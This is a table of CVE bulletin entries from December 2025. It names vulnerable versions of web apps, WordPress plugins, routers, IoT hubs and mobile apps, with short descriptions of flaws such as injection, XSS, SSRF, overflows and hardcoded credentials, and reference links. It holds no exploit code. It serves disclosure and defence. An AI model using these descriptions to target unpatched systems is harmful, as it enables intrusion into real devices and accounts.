| n/a--SourceCodester Patients Waiting Area Queue Management System v1 | SQL injection vulnerability in /php/api_patient_schedule.php in SourceCodester Patients Waiting Area Queue Management System v1 allows attackers to execute arbitrary SQL commands via the appointmentID parameter. | 2025-12-08 | not yet calculated | CVE-2025-64081 | https://www.sourcecodester.com/php/18348/patients-waiting-area-queue-management-system.html https://packetstorm.news/files/id/211592 |
| n/a--PDF-XChange Editor v10.7.3.401 | A NULL pointer dereference vulnerability in the importDataObject() function of PDF-XChange Editor v10.7.3.401 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2025-12-09 | not yet calculated | CVE-2025-64085 | https://www.pdf-xchange.com/ https://jeroscope.com/advisories/2025/jero-2025-012/ |
| n/a--PDF-XChange Editor v10.7.3.401 | A NULL pointer dereference vulnerability in the util.readFileIntoStream component of PDF-XChange Editor v10.7.3.401 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2025-12-09 | not yet calculated | CVE-2025-64086 | https://www.pdf-xchange.com/ https://jeroscope.com/advisories/2025/jero-2025-011/ |
| EmbySupport--security | Emby Server is a user-installable home media server. Versions below 4.9.1.81 allow an attacker to gain full administrative access to an Emby Server (for Emby Server administration, not at the OS level). Other than network access, no specific preconditions need to be fulfilled for a server to be vulnerable. This issue is fixed in version 4.9.1.81. | 2025-12-09 | not yet calculated | CVE-2025-64113 | https://github.com/EmbySupport/Emby.Security/security/advisories/GHSA-95fv-5gfj-2r84 |
| Ronald Huereca--Photo Block | Missing Authorization vulnerability in Ronald Huereca Photo Block photo-block allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Photo Block: from n/a through <= 1.5.1. | 2025-12-09 | not yet calculated | CVE-2025-64254 | https://vdp.patchstack.com/database/Wordpress/Plugin/photo-block/vulnerability/wordpress-photo-block-plugin-1-5-1-broken-access-control-vulnerability?_s_id=cve |
| Bowo--Admin and Site Enhancements (ASE) | Missing Authorization vulnerability in Bowo Admin and Site Enhancements (ASE) admin-site-enhancements allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Admin and Site Enhancements (ASE): from n/a through <= 8.0.8. | 2025-12-09 | not yet calculated | CVE-2025-64255 | https://vdp.patchstack.com/database/Wordpress/Plugin/admin-site-enhancements/vulnerability/wordpress-admin-and-site-enhancements-ase-plugin-8-0-8-broken-access-control-vulnerability?_s_id=cve |
| PressTigers--Simple Folio | Cross-Site Request Forgery (CSRF) vulnerability in PressTigers Simple Folio simple-folio allows Cross Site Request Forgery. This issue affects Simple Folio: from n/a through <= 1.1.0. | 2025-12-09 | not yet calculated | CVE-2025-64256 | https://vdp.patchstack.com/database/Wordpress/Plugin/simple-folio/vulnerability/wordpress-simple-folio-plugin-1-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Joe Dolson--My Tickets | Missing Authorization vulnerability in Joe Dolson My Tickets my-tickets allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects My Tickets: from n/a through <= 2.1.0. | 2025-12-09 | not yet calculated | CVE-2025-64257 | https://vdp.patchstack.com/database/Wordpress/Plugin/my-tickets/vulnerability/wordpress-my-tickets-plugin-2-1-0-broken-access-control-vulnerability?_s_id=cve |
| Brother Industries, Ltd.--Android App "Brother iPrint&Scan" | Android App "Brother iPrint&Scan" versions 6.13.7 and earlier improperly uses an external cache directory. If exploited, application-specific files may be accessed from other malicious applications. | 2025-12-09 | not yet calculated | CVE-2025-64696 | https://support.brother.com/g/s/security/ https://jvn.jp/en/vu/JVNVU99973778/ |
| QualitySoft Corporation--QND Premium/Advance/Standard | QND Premium/Advance/Standard Ver.11.0.9i and prior contains a privilege escalation vulnerability, which may allow a user who can log in to a Windows system with the affected product to gain administrator privileges. As a result, sensitive information may be accessed or altered, and arbitrary actions may be performed. | 2025-12-11 | not yet calculated | CVE-2025-64701 | https://www.qualitysoft.com/product/qnd_vulnerabilities_2025/ https://jvn.jp/jp/JVN40102375/ |
| sandboxie-plus--Sandboxie | Sandboxie is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. In versions 1.16.6 and below, the SYSTEM-level service SbieSvc.exe exposes SbieIniServer::RC4Crypt to sandboxed processes. The handler adds a fixed header size to a caller-controlled value_len without overflow checking. A large value_len (e.g., 0xFFFFFFF0) wraps the allocation size, causing a heap overflow when attacker data is copied into the undersized buffer. This allows sandboxed processes to execute arbitrary code as SYSTEM, fully compromising the host. This issue is fixed in version 1.16.7. | 2025-12-11 | not yet calculated | CVE-2025-64721 | https://github.com/sandboxie-plus/Sandboxie/security/advisories/GHSA-w476-j57g-96vp https://github.com/sandboxie-plus/Sandboxie/commit/000492f8c411d24292f1b977a107994347bc7dfa https://github.com/sandboxie-plus/Sandboxie/releases/tag/v1.16.7 |
| Japan Total System Co.,Ltd.--GroupSession Free edition | In GroupSession Free edition prior to ver5.7.1, GroupSession byCloud prior to ver5.7.1, and GroupSession ZION prior to ver5.7.1, "External page display restriction" is set to "Do not limit" in the initial configuration. With this configuration, the user may be redirected to an arbitrary website when accessing a specially crafted URL. | 2025-12-12 | not yet calculated | CVE-2025-64781 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| Japan Total System Co.,Ltd.--GroupSession Free edition | A reflected cross-site scripting vulnerability exists in GroupSession Free edition prior to ver5.7.1, GroupSession byCloud prior to ver5.7.1, and GroupSession ZION prior to ver5.7.1. If a user accesses a crafted page or URL, an arbitrary script may be executed in the user's web browser. | 2025-12-12 | not yet calculated | CVE-2025-65120 | https://groupsession.jp/info/info-news/security20251208 https://jvn.jp/en/jp/JVN19940619/ |
| n/a--R.V.R. Elettronica TLK302T | A stored cross-site scripting vulnerability exists in the web management interface of the R.V.R. Elettronica TLK302T telemetry controller (firmware 1.5.1799). | 2025-12-08 | not yet calculated | CVE-2025-65228 | https://www.rvr.it/en/products/components/telemetry-units-system/tlk300-series/tlk302t/ https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-65228 |
| n/a--Lyrion Music Server <= 9.0.3. | A stored cross-site scripting (XSS) vulnerability exists in the web interface of Lyrion Music Server <= 9.0.3. An authenticated user with access to Settings Player can save arbitrary HTML/JavaScript in the Player name field. That value is stored by the server and later rendered without proper output encoding on the Information (Player Info) tab, causing the script to execute in the context of any user viewing that page. | 2025-12-08 | not yet calculated | CVE-2025-65229 | https://lyrion.org/ |
| n/a--Barix Instreamer v04.06 and v04.05 | Barix Instreamer v04.06 and v04.05 contains a stored cross-site scripting (XSS) vulnerability in the Web UI Configuration Streaming Destination input. | 2025-12-08 | not yet calculated | CVE-2025-65230 | https://help.barix.com/instreamer/user-manual https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-65230 |
| n/a--Barix Instreamer v04.06 and earlier | Barix Instreamer v04.06 and earlier is vulnerable to Cross Site Scripting (XSS) in the Web UI I/O & Serial configuration page, specifically the CTS close command user-input field which is stored and later rendered on the Status page. | 2025-12-08 | not yet calculated | CVE-2025-65231 | https://help.barix.com/instreamer/user-manual https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-65231 |
| n/a--Azuriom CMS admin dashboard | Client-side template injection (CSTI) in Azuriom CMS admin dashboard allows a low-privilege user to execute arbitrary template code in the context of an administrator's session. This can occur via plugins or dashboard components that render untrusted user input, potentially enabling privilege escalation to an administrative account. Fixed in Azuriom 1.2.7. | 2025-12-08 | not yet calculated | CVE-2025-65271 | https://github.com/Azuriom/Azuriom https://www.github.com/Azuriom/Azuriom https://github.com/Azuriom/Azuriom/commit/0289175547319add814dcb526e8ba034f1ebc3ec https://www.github.com/Azuriom/Azuriom/commit/0289175547319add814dcb526e8ba034f1ebc3ec https://github.com/1337Skid/CVE-2025-65271 |
| n/a--SNMP Web Pro 1.1 | An unauthenticated directory traversal vulnerability in cgi-bin/upload.cgi in SNMP Web Pro 1.1 allows a remote attacker to read arbitrary files. The CGI concatenates the user-supplied params directly onto the base path (/var/www/files/userScript/) using memcpy + strcat without validation or canonicalization, enabling ../ sequences to escape the intended directory. The download branch also echoes the unsanitized params into Content-Disposition, introducing header-injection risk. | 2025-12-09 | not yet calculated | CVE-2025-65287 | https://damiri.fr/en/cve/CVE-2025-65287 |
| n/a--Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) | A buffer overflow in the Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) occurs when the device accepts and stores excessively long hostnames from LAN hosts without proper length validation. The affected code performs unchecked copies/concatenations into fixed-size buffers. A crafted long hostname can overflow the buffer, cause a crash (DoS) and potentially enable remote code execution. | 2025-12-09 | not yet calculated | CVE-2025-65288 | https://damiri.fr/en/cve/CVE-2025-65288 |
| n/a--Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) router | A stored Cross site scripting (XSS) vulnerability in the Mercury MR816v2 (081C3114 4.8.7 Build 110427 Rel 36550n) router allows a remote attacker on the LAN to inject JavaScript into the router's management UI by submitting a malicious hostname. The injected script is stored and later executed in the context of an administrator's browser (for example after DHCP release/renew triggers the interface to display the stored hostname). Because the management interface uses weak/basic authentication and does not properly protect or isolate session material, the XSS can be used to exfiltrate the admin session and perform administrative actions. | 2025-12-09 | not yet calculated | CVE-2025-65289 | https://damiri.fr/en/cve/CVE-2025-65289 |
| n/a--Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 | Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 fail to validate server certificates during HTTPS firmware downloads, allowing man-in-the-middle attackers to intercept firmware update traffic and potentially serve modified firmware files. | 2025-12-10 | not yet calculated | CVE-2025-65290 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/OTA-Certificate-Validation-Bypass.md |
| n/a--Aqara Hub devices including Hub M2 4.3.6_0027, Hub M3 4.3.6_0025, Camera Hub G3 4.1.9_0027 | Aqara Hub devices including Hub M2 4.3.6_0027, Hub M3 4.3.6_0025, Camera Hub G3 4.1.9_0027 fail to validate server certificates in TLS connections for discovery services and CoAP gateway communications, enabling man-in-the-middle attacks on device control and monitoring. | 2025-12-10 | not yet calculated | CVE-2025-65291 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/CoAP-Certificate-Validation-Bypass.md |
| n/a--Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 | Command injection vulnerability in Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 allows attackers to execute arbitrary commands with root privileges through malicious domain names. | 2025-12-10 | not yet calculated | CVE-2025-65292 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/DNS-Command-Injection.md |
| n/a--Aqara Camera Hub G3 4.1.9_0027 | Command injection vulnerabilities in Aqara Camera Hub G3 4.1.9_0027 allow attackers to execute arbitrary commands with root privileges through malicious QR codes during device setup and factory reset. | 2025-12-10 | not yet calculated | CVE-2025-65293 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/QR-Command-Injection.md |
| n/a--Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 | Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 contain an undocumented remote access mechanism enabling unrestricted remote command execution. | 2025-12-10 | not yet calculated | CVE-2025-65294 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/QR-Command-Injection.md https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/Undocumented-Remote-Execution.md |
| n/a--Aqara Hub firmware update process in the Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 devices | Multiple vulnerabilities in Aqara Hub firmware update process in the Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 devices, allow attackers to install malicious firmware without proper verification. The device fails to validate firmware signatures during updates, uses outdated cryptographic methods that can be exploited to forge valid signatures, and exposes information through improperly initialized memory. | 2025-12-10 | not yet calculated | CVE-2025-65295 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/OTA-Firmware-Insecurity.md |
| n/a--Aqara Hub M2 4.3.6_0027, Hub M3 4.3.6_0025, and Camera Hub G3 4.1.9_0027 | NULL-pointer dereference vulnerabilities in Aqara Hub M2 4.3.6_0027, Hub M3 4.3.6_0025, and Camera Hub G3 4.1.9_0027 in the JSON processing enable denial-of-service attacks through malformed JSON inputs. | 2025-12-10 | not yet calculated | CVE-2025-65296 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/JSON-NULL-Dereference.md |
| n/a--Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 | Aqara Hub devices including Camera Hub G3 4.1.9_0027, Hub M2 4.3.6_0027, and Hub M3 4.3.6_0025 automatically collect and upload unencrypted sensitive information. Note that this occurs without disclosure or consent from the manufacturer. | 2025-12-10 | not yet calculated | CVE-2025-65297 | https://github.com/Chapoly1305/myCVEReports/blob/main/Aqara/Unauthorized-Data-Upload.md |
| n/a--Coohom SaaS Platform feVersion=1760060603897 (2025-10-28) | A stored Cross-Site Scripting (XSS) vulnerability exists in the Coohom SaaS Platform feVersion=1760060603897 (2025-10-28) in the Account Settings module, where unsanitized user input in Address fields (City, State, Country/Region) is rendered back to the page. Attackers can inject arbitrary JavaScript code, which executes when the affected profile page is viewed. This can lead to session hijacking, cookie theft, or arbitrary script execution in the victim's browser. | 2025-12-09 | not yet calculated | CVE-2025-65300 | https://www.coohom.com/pub/saas/settings/account https://gist.github.com/garux-sec/ec9a6b6e7e4b617b7245ec18252a6377 |
| n/a--Ruijie APs (AP_RGOS 11.1.x) | An authenticated append-style command injection in Ruijie APs (AP_RGOS 11.1.x) allows an authenticated web user to execute appended shell expressions as root, enabling file disclosure, device disruption, and potential network pivoting via the command parameter to the web_action.do endpoint. | 2025-12-08 | not yet calculated | CVE-2025-65363 | http://ruijie.com http://rg-ap720-l.com https://github.com/tmogg/security-advisories/blob/main/CVE-2025-65363/README.md |
| n/a--EasyImages 2.0 v2.8.6 and below | An arbitrary file upload vulnerability in the /admin/manager.php component of EasyImages 2.0 v2.8.6 and below allows attackers to execute arbitrary code via uploading a crafted PHP file. | 2025-12-11 | not yet calculated | CVE-2025-65471 | https://congsec.cn/?id=20251102153546-i712jss https://gist.github.com/CongSec/cd3d3ee57b8e6f83c7038e2263c15120 |
| n/a--EasyImages 2.0 v2.8.6 and below | A Cross-Site Request Forgery (CSRF) in the /admin/admin.inc.php component of EasyImages 2.0 v2.8.6 and below allows attackers to escalate privileges to Administrator via user interaction with a malicious web page. | 2025-12-11 | not yet calculated | CVE-2025-65472 | https://congsec.cn/?id=20251104215007-yjddwx1 https://gist.github.com/CongSec/a6c8b15878f19647dbd26c22b47bac65 |
| n/a--EasyImages 2.0 v2.8.6 and below | An arbitrary file rename vulnerability in the /admin/filer.php component of EasyImages 2.0 v2.8.6 and below allows attackers with Administrator privileges to execute arbitrary code via injecting a crafted payload into an uploaded file name. | 2025-12-11 | not yet calculated | CVE-2025-65473 | https://congsec.cn?id=20251103235610-7t4en7j https://gist.github.com/CongSec/107b9cab6dd1cb297a738f11e2b2dbb6 |
| n/a--EasyImages 2.0 v2.8.6 and below | An arbitrary file rename vulnerability in the /admin/manager.php component of EasyImages 2.0 v2.8.6 and below allows attackers to execute arbitrary code via renaming a PHP file to an SVG format. | 2025-12-11 | not yet calculated | CVE-2025-65474 | https://congsec.cn?id=20251103234511-9418dk9 https://gist.github.com/CongSec/3cf968621f71a7da35dcc9b8f0b29bb2 |
| n/a--markdownify-mcp v0.0.2 and before | A Server-Side Request Forgery (SSRF) vulnerability was discovered in the webpage-to-markdown conversion feature of markdownify-mcp v0.0.2 and before. This vulnerability allows an attacker to bypass private IP restrictions through hostname-based bypass and HTTP redirect chains, enabling access to internal network services. | 2025-12-10 | not yet calculated | CVE-2025-65512 | https://thorn-pheasant-6d8.notion.site/markdownify-mcp-Report-2a03daf7b44180908ff4eea0c2915763 https://github.com/Team-Off-course/MCP-Server-Vuln-Analysis/blob/main/CVE-2025-65512.md |
| n/a--fetch-mcp v1.0.2 and before | fetch-mcp v1.0.2 and before is vulnerable to Server-Side Request Forgery (SSRF), which allows attackers to bypass private IP validation and access internal network resources. | 2025-12-09 | not yet calculated | CVE-2025-65513 | https://thorn-pheasant-6d8.notion.site/fetch-mcp-2853daf7b44180029ca5d56e03195736 https://github.com/Team-Off-course/MCP-Server-Vuln-Analysis/blob/main/CVE-2025-65513.md |
| n/a--CloudLinux ai-bolit before v32.7.4 | An eval injection in the malware de-obfuscation routines of CloudLinux ai-bolit before v32.7.4 allows attackers to overwrite arbitrary files as root via scanning a crafted file. | 2025-12-12 | not yet calculated | CVE-2025-65530 | http://cloudlinux.com http://ai-bolit.com https://blog.imunify360.com/security-advisory-imunify-ai-bolit-vulnerability |
| n/a--NUT-14 | NUT-14 allows cashu tokens to be created with a preimage hash. However, nutshell (cashubtc/nuts) before 0.18.0 does not validate the size of the preimage when the token is spent. The preimage is stored by the mint, and an attacker can exploit this vulnerability to fill the mint's database and disk with arbitrary data. | 2025-12-08 | not yet calculated | CVE-2025-65548 | https://delvingbitcoin.org/t/public-disclosure-denial-of-service-using-htlc-in-cashu/2090 https://github.com/cashubtc/nuts/blob/main/14.md https://github.com/cashubtc/nuts/blob/main/07.md https://preimage007.github.io/ https://github.com/jamesob/delving-bitcoin-archive/blob/master/archive/rendered-topics/2025-11-November/2025-11-02-public-disclosure-denial-of-service-using-htlc-in-cashu-id2090.md https://bitcointalk.org/index.php?topic=5564329 |
| n/a--AllskyTeam AllSky v2024.12.06_06 | Cross Site Scripting (XSS) vulnerability in AllskyTeam AllSky v2024.12.06_06 allows remote attackers to execute arbitrary code via the (1) config, (2) filename, or (3) extratext parameter to allskySettings.php. When the page is reloaded or when user visits allskySettings.php, the showMessages() function in status_messages.php will print out the error messages and execute the script injected by the attacker. | 2025-12-09 | not yet calculated | CVE-2025-65572 | https://github.com/AllskyTeam/allsky https://github.com/AllskyTeam/allsky/blob/master/html/includes/status_messages.php https://github.com/AllskyTeam/allsky/blob/master/html/includes/allskySettings.php https://gh0stmezh.wordpress.com/2025/12/04/cve-2025-65572/ |
| n/a--AllskyTeam AllSky v2024.12.06_06 | Cross Site Request Forgery (CSRF) vulnerability in AllskyTeam AllSky v2024.12.06_06 allows remote attackers to cause a denial of service via function handle_interface_POST_and_status. | 2025-12-09 | not yet calculated | CVE-2025-65573 | https://github.com/AllskyTeam/allsky https://github.com/AllskyTeam/allsky/blob/master/html/includes/functions.php https://github.com/AllskyTeam/allsky/blob/master/html/includes/dashboard_LAN.php https://github.com/AllskyTeam/allsky/blob/master/html/includes/dashboard_WLAN.php https://gh0stmezh.wordpress.com/2025/12/05/cve-2025-65573/ |
| n/a--OpenSIS 9.2 and below | OpenSIS 9.2 and below is vulnerable to Incorrect Access Control in Student.php, which allows an authenticated low-privilege user to perform unauthorized database write operations relating to the data of other users. | 2025-12-09 | not yet calculated | CVE-2025-65594 | http://opensis.com https://gitlab.com/tsuretettee/cve-2025-65594 |
| n/a--ChanCMS v3.3.4 | A template injection vulnerability in the /vip/v1/file/save component of ChanCMS v3.3.4 allows attackers to execute arbitrary code via a crafted POST request. | 2025-12-10 | not yet calculated | CVE-2025-65602 | https://gitee.com/chancms/ChanCMS https://www.notion.so/ChanCMS-Unauthenticated-RCE-2a3ee9235ba380fc9973e16c06258689?source=copy_link https://www.notion.so/ChanCMS-Unauthenticated-RCE-2a3ee9235ba380fc9973e16c06258689 |
| n/a--Sublime Text 3 Build 3208 or prior | Sublime Text 3 Build 3208 or prior for macOS is vulnerable to Dylib Injection. An attacker could compile a .dylib file and force the execution of this library in the context of the Sublime Text application. | 2025-12-09 | not yet calculated | CVE-2025-65741 | https://github.com/sublimehq/sublime_text https://www.sublimetext.com/3 https://github.com/vinicius-batistella/CVE-2025-65741/ |
| n/a--Algernon v1.17.4 | Cross Site Scripting vulnerability in Algernon v1.17.4 allows attackers to execute arbitrary code via injecting a crafted payload into a filename. | 2025-12-10 | not yet calculated | CVE-2025-65754 | https://gist.github.com/Bnyt7/0faa90ff93c5d98093a0e29a1eb34d81 https://github.com/xyproto/algernon https://github.com/Bnyt7/CVE-2025-65754 |
| n/a--DataGear v5.5.0 | DataGear v5.5.0 is vulnerable to Arbitrary File Deletion. | 2025-12-10 | not yet calculated | CVE-2025-65792 | https://github.com/X3J1n/datagear/issues/1 https://gist.github.com/X3J1n/82b047efdbfd74c414a6d63339ad12fb |
| n/a--usememos memos v0.25.2 | Incorrect access control in the /api/v1/user endpoint of usememos memos v0.25.2 allows unauthorized attackers to create arbitrary accounts via a crafted request. | 2025-12-08 | not yet calculated | CVE-2025-65795 | http://memos.com http://usememos.com https://github.com/usememos/memos/pull/5217 https://herolab.usd.de/usd-2025-0058/ |
| n/a--usememos memos v0.25.2 | Incorrect access control in usememos memos v0.25.2 allows attackers with low-level privileges to arbitrarily delete reactions made to other users' Memos. | 2025-12-08 | not yet calculated | CVE-2025-65796 | http://memos.com http://usememos.com https://github.com/usememos/memos/pull/5217 https://herolab.usd.de/security-advisories/usd-2025-0060/ |
| n/a--usememos memos v0.25.2 | Incorrect access control in the Identity Provider service of usememos memos v0.25.2 allows attackers with low-level privileges to arbitrarily modify or delete registered identity providers, leading to an account takeover or Denial of Service (DoS). | 2025-12-08 | not yet calculated | CVE-2025-65797 | http://memos.com http://usememos.com https://github.com/usememos/memos/pull/5217 https://herolab.usd.de/security-advisories/usd-2025-0057/ |
| n/a--usememos memos v0.25.2 | Incorrect access control in usememos memos v0.25.2 allows attackers with low-level privileges to arbitrarily modify or delete attachments made by other users. | 2025-12-08 | not yet calculated | CVE-2025-65798 | http://memos.com http://usememos.com https://github.com/usememos/memos/pull/5217 https://herolab.usd.de/security-advisories/usd-2025-0059/ |
| n/a--usememos memos v0.25.2 | A lack of file name validation or verification in the Attachment service of usememos memos v0.25.2 allows attackers to execute a path traversal. | 2025-12-08 | not yet calculated | CVE-2025-65799 | http://memos.com http://usememos.com https://github.com/usememos/memos/pull/5218 https://herolab.usd.de/security-advisories/usd-2025-0056/ |
| n/a--FreeImage v3.18.0 | An integer overflow in the psdParser::ReadImageData function of FreeImage v3.18.0 and before allows attackers to cause a Denial of Service (DoS) via supplying a crafted PSD file. | 2025-12-10 | not yet calculated | CVE-2025-65803 | https://freeimage.sourceforge.io/download.html https://gist.github.com/1mxml/cabd6d972557d9d992fe5f4f6ca1dd87 |
| n/a--Tenda AX3 v16.03.12.11 | Tenda AX3 v16.03.12.11 contains a stack overflow in formSetIptv via the iptvType parameter, which can cause memory corruption and enable remote code execution (RCE). | 2025-12-08 | not yet calculated | CVE-2025-65804 | https://river-brow-763.notion.site/Tenda-AX3-Buffer-Overflow-in-formSetIptv-2aaa595a7aef8072968edc528a2d95b1 |
| n/a--sd command v1.0.0 | An issue in sd command v1.0.0 and before allows attackers to escalate privileges to root via a crafted command. | 2025-12-10 | not yet calculated | CVE-2025-65807 | http://sd.com https://github.com/chmln/sd https://gist.github.com/faabbi/827f10e144fdd342e13a3dd838902e83 |
| n/a--RHOPHI Analytics LLP Office App-Edit Word v6.4.1 | A lack of security checks in the file import process of RHOPHI Analytics LLP Office App-Edit Word v6.4.1 allows attackers to execute a directory traversal. | 2025-12-10 | not yet calculated | CVE-2025-65814 | https://developer.android.com/privacy-and-security/risks/untrustworthy-contentprovider-provided-filename https://github.com/Secsys-FDU/AF_CVEs/issues/6 |
| n/a--AB TECHNOLOGY Document Reader: PDF, DOC, PPT v65.0 | A lack of security checks in the file import process of AB TECHNOLOGY Document Reader: PDF, DOC, PPT v65.0 allows attackers to execute a directory traversal. | 2025-12-10 | not yet calculated | CVE-2025-65815 | https://developer.android.com/privacy-and-security/risks/untrustworthy-contentprovider-provided-filename https://github.com/Secsys-FDU/AF_CVEs/issues/7 |
| n/a--Meatmeet Android Mobile Application 1.1.2.0. | An issue was discovered in Meatmeet Android Mobile Application 1.1.2.0. An exported activity can be spawned with the mobile application which opens a hidden page. This page, which is not available through the normal flows of the application, contains several devices which can be added to your account, two of which have not been publicly released. As a result of this vulnerability, the attacker can gain insight into unreleased Meatmeet devices. | 2025-12-10 | not yet calculated | CVE-2025-65820 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Mobile-Application/Information-Disclosure.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-information-disclosure-md |
| n/a--Meatmeet Pro BBQ Thermometer v1.0.34.4 | As UART download mode is still enabled on the ESP32 chip on which the firmware runs, an adversary can dump the flash from the device and retrieve sensitive information such as details about the current and previous Wi-Fi network from the NVS partition. Additionally, this allows the adversary to reflash the device with their own firmware which may contain malicious modifications. | 2025-12-10 | not yet calculated | CVE-2025-65821 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/UART-Download-Mode-Enabled.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-uart-download-mode-enabled-md |
| n/a--Meatmeet Pro BBQ Thermometer v1.0.34.4 | The ESP32 system on a chip (SoC) that powers the Meatmeet Pro was found to have JTAG enabled. By leaving JTAG enabled on an ESP32 in a commercial product, an attacker with physical access to the device can connect over this port and reflash the device's firmware with malicious code which will be executed upon running. As a result, the victim will lose access to the functionality of their device and the attacker may gain unauthorized access to the victim's Wi-Fi network by re-connecting to the SSID defined in the NVS partition of the device. | 2025-12-10 | not yet calculated | CVE-2025-65822 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/JTAG-Enabled.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-jtag-enabled-md |
| n/a--Meatmeet Pro BBQ Thermometer v1.0.34.4 | The Meatmeet Pro was found to be shipped with hardcoded Wi-Fi credentials in the firmware, for the test network it was developed on. If an attacker retrieved this, and found the physical location of the Wi-Fi network, they could gain unauthorized access to the Wi-Fi network of the vendor. Additionally, if an attacker were located in close physical proximity to the device when it was first set up, they may be able to force the device to auto-connect to an attacker-controlled access point by setting the SSID and password to the same as which was found in the firmware file. | 2025-12-10 | not yet calculated | CVE-2025-65823 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/Hardcoded-Credentials.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-hardcoded-credentials-esp32-md |
| n/a--Meatmeet Pro BBQ Thermometer v1.0.34.4 | An unauthenticated attacker within proximity of the Meatmeet device can perform an unauthorized Over The Air (OTA) firmware upgrade using Bluetooth Low Energy (BLE), resulting in the firmware on the device being overwritten with the attacker's code. As the device does not perform checks on upgrades, this results in Remote Code Execution (RCE) and the victim losing complete access to the Meatmeet. | 2025-12-10 | not yet calculated | CVE-2025-65824 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/Remote-Code-Execution.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-remote-code-execution-md |
| n/a--Meatmeet Pro BBQ Thermometer v1.0.34.4 | The firmware on the basestation of the Meatmeet is not encrypted. An adversary with physical access to the Meatmeet device can disassemble the device, connect over UART, and retrieve the firmware dump for analysis. Within the NVS partition they may discover the credentials of the current and previous Wi-Fi networks. This information could be used to gain unauthorized access to the victim's Wi-Fi network. | 2025-12-10 | not yet calculated | CVE-2025-65825 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/Flash-Encryption-Disabled.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-flash-encryption-disabled-md |
| n/a--Meatmeet Pro Mobile Application v1.1.2.0 | The mobile application was found to contain stored credentials for the network it was developed on. If an attacker retrieved this, and found the physical location of the Wi-Fi network, they could gain unauthorized access to the Wi-Fi network of the vendor. Additionally, if an attacker were located in close physical proximity to the device when it was first set up, they may be able to force the device to auto-connect to an attacker-controlled access point by setting the SSID and password to the same as which was found in the firmware file. | 2025-12-10 | not yet calculated | CVE-2025-65826 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Mobile-Application/Hardcoded-Credentials.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-hardcoded-credentials-mobile-md |
| n/a--Meatmeet Pro Mobile Application v1.1.2.0 | The mobile application is configured to allow clear text traffic to all domains and communicates with an API server over HTTP. As a result, an adversary located "upstream" can intercept the traffic, inspect its contents, and modify the requests in transit. This may result in a total compromise of the user's account if the attacker intercepts a request with active authentication tokens or cracks the MD5 hash sent on login. | 2025-12-10 | not yet calculated | CVE-2025-65827 | https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Mobile-Application/Clear-Text-Traffic-Enabled.md https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-clear-text-traffic-enabled-md |
| n/a--Meatmeet Pro BBQ Thermometer v1.0.34.4 | An unauthenticated attacker within proximity of the Meatmeet device can issue several commands over Bluetooth Low Energy (BLE) to these devices which would result in a Denial of Service. These commands include: shutdown, restart, clear config. Clear config would disassociate the current device from its user and would require re-configuration to re-enable the device. As a result, the end user would be unable to receive updates from the Meatmeet base station which communicates with the cloud services until the device had been fixed or turned back on. | 2025-12-10 | not yet calculated | CVE-2025-65828 | http://meatmeet.com https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-denial-of-service-ble-md |
